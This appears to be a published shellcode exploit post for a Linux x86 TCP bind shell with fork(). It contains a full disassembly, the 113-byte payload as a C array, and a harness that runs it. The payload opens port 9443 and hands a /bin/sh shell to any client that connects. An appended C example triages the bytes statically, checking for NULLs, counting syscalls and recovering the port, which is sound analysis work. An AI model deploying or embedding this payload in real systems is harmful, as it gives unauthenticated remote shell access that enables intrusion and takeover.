/*
Title: Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
Author: Amine Kanane <aminekanane_93@hotmail.com>
Student-ID: SLAE - 1203
Desc: Listen for a connection on Local Port 9443 and spawn a command shell
This version supports multiple simultaneous connections using fork().
This shellcode also does not use the classic socketcall() multiplexer; it calls the direct socket(), bind(), listen() and accept4() syscalls (0x167, 0x169, 0x16b, 0x16c) that i386 kernels expose since Linux 4.3.
Tested on: Linux/x86 - SMP Debian 4.9.30-1kali1
Date: 7 May 2018
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: 66 b8 67 01 mov ax,0x167
804806c: b3 02 mov bl,0x2
804806e: b1 01 mov cl,0x1
8048070: cd 80 int 0x80
8048072: 89 c3 mov ebx,eax
8048074: 66 b8 69 01 mov ax,0x169
8048078: 52 push edx
8048079: 66 68 24 e3 pushw 0xe324 ; <== This is where we set the port number, please note that you need to adapt the number using htons() before :)
804807d: 66 6a 02 pushw 0x2
8048080: 89 e1 mov ecx,esp
8048082: b2 10 mov dl,0x10
8048084: cd 80 int 0x80
8048086: 66 b8 6b 01 mov ax,0x16b
804808a: 31 c9 xor ecx,ecx
804808c: cd 80 int 0x80
0804808e <infinite>:
804808e: 31 d2 xor edx,edx
8048090: 31 f6 xor esi,esi
8048092: 66 b8 6c 01 mov ax,0x16c
8048096: cd 80 int 0x80
8048098: 89 c6 mov esi,eax
804809a: 31 c0 xor eax,eax
804809c: b0 02 mov al,0x2
804809e: cd 80 int 0x80
80480a0: 31 ff xor edi,edi
80480a2: 39 f8 cmp eax,edi
80480a4: 75 e8 jne 804808e <infinite>
80480a6: 31 c0 xor eax,eax
80480a8: b0 06 mov al,0x6
80480aa: cd 80 int 0x80
80480ac: 89 f3 mov ebx,esi
80480ae: b1 02 mov cl,0x2
080480b0 <loop_dup>:
80480b0: b0 3f mov al,0x3f
80480b2: cd 80 int 0x80
80480b4: fe c9 dec cl
80480b6: 79 f8 jns 80480b0 <loop_dup>
80480b8: 31 c0 xor eax,eax
80480ba: 50 push eax
80480bb: 89 e2 mov edx,esp
80480bd: 68 2f 2f 73 68 push 0x68732f2f
80480c2: 68 2f 62 69 6e push 0x6e69622f
80480c7: 89 e3 mov ebx,esp
80480c9: 50 push eax
80480ca: 53 push ebx
80480cb: 89 e1 mov ecx,esp
80480cd: b0 0b mov al,0xb
80480cf: cd 80 int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8"
"\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
"\x66\xb8\x69\x01\x52\x66\x68"
"\x24\xe3" // ==> port number = 9443; sock_ad.sin_port = htons(9443);
"\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66"
"\xb8\x6b\x01\x31\xc9\xcd\x80\x31\xd2\x31"
"\xf6\x66\xb8\x6c\x01\xcd\x80\x89\xc6\x31"
"\xc0\xb0\x02\xcd\x80\x31\xff\x39\xf8\x75"
"\xe8\x31\xc0\xb0\x06\xcd\x80\x89\xf3\xb1"
"\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31"
"\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
"\xb0\x0b\xcd\x80";

/* Test harness: the byte array must live in an executable segment, so build
 * with gcc -fno-stack-protector -z execstack (32-bit target). */
int main(void)
{
	printf("Shellcode Length: %zu\n", strlen((char *)code));

	int (*ret)(void) = (int (*)(void))code;
	ret();
	return 0;
}
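Static triage of the bytes above, as an added example that is not part of the original post: it checks the NULL-free claim, counts the int 0x80 syscall sites, and recovers the listening port from the "push edx; pushw PORT; pushw 2" sockaddr_in construction without ever executing the payload. The function names and the embedded copy of the bytes are this example's own.

```c
#include <stddef.h>

/* Constructed sample input: the 113 shellcode bytes listed on this page. */
const unsigned char sample[] =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8"
    "\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
    "\x66\xb8\x69\x01\x52\x66\x68\x24\xe3"
    "\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66"
    "\xb8\x6b\x01\x31\xc9\xcd\x80\x31\xd2\x31"
    "\xf6\x66\xb8\x6c\x01\xcd\x80\x89\xc6\x31"
    "\xc0\xb0\x02\xcd\x80\x31\xff\x39\xf8\x75"
    "\xe8\x31\xc0\xb0\x06\xcd\x80\x89\xf3\xb1"
    "\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31"
    "\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68"
    "\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
    "\xb0\x0b\xcd\x80";
const size_t sample_len = sizeof(sample) - 1; /* drop the string terminator */

/* Returns 1 if any byte is 0x00: such a payload would be cut short by
 * strcpy-style copies, which is why "NULL free" matters to the author. */
int has_null_byte(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00) return 1;
    return 0;
}

/* Counts "cd 80" pairs (int 0x80): one per Linux i386 syscall site. */
int count_int80(const unsigned char *buf, size_t len) {
    int n = 0;
    for (size_t i = 0; i + 1 < len; i++)
        if (buf[i] == 0xcd && buf[i + 1] == 0x80) n++;
    return n;
}

/* Looks for "52 66 68 hh ll 66 6a 02" (push edx; pushw imm16; pushw 2 = AF_INET)
 * and returns the port in host order. sin_port is stored in network order, so
 * the first immediate byte is the high byte. Returns -1 if not found. */
int bind_shell_port(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i + 8 <= len; i++) {
        if (buf[i] == 0x52 && buf[i + 1] == 0x66 && buf[i + 2] == 0x68 &&
            buf[i + 5] == 0x66 && buf[i + 6] == 0x6a && buf[i + 7] == 0x02)
            return (buf[i + 3] << 8) | buf[i + 4];
    }
    return -1;
}
```

For the bytes on this page the checks yield 113 bytes, no NULL, 8 syscall sites and port 9443, which matches the header and the pushw 0xe324 comment in the disassembly.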